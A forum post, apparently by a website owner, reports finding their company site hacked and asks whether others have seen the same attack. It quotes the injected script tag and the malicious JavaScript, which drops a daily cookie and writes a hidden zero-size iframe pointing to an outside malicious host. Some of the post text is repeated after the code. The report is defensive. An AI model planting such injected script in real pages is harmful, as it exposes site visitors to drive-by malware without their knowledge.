CJones
Final Approach
I went to check on one of my company's sites, and it was taking longer than normal to respond. I paid attention to the status messages at the bottom of the browser and noticed that it was reading something from news.212cafe.com. Weird. Look at the page source once the page loads, and the following line is at the very top of the page (even before the <html> tag):
Uh oh. Not good. I pulled up the .js file and it contains the following:
The 'm.winxyz.com' site won't come up as it appear malicious, but I can only assume that they are NOT trying to post pictures of cute puppies on my site.
I've submitted a ticket to our web host (networksolutions) and the site is down right now, hopefully so they can investigate any security breaches.
Anyone else seeing this hack recently, or am I just a lucky one?
Code:
<script src=http://news.212cafe.com/images/j.js></script>
Code:
[FONT=Verdana]function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=risb;expires="+ Then.toGMTString()
window.status=' ';
document.write("<iframe src=\"http://m.winxyz.com\" width=0 height=0></ifame>");
}
}Get();
[/FONT]The 'm.winxyz.com' site won't come up as it appear malicious, but I can only assume that they are NOT trying to post pictures of cute puppies on my site.
I've submitted a ticket to our web host (networksolutions) and the site is down right now, hopefully so they can investigate any security breaches.
Anyone else seeing this hack recently, or am I just a lucky one?
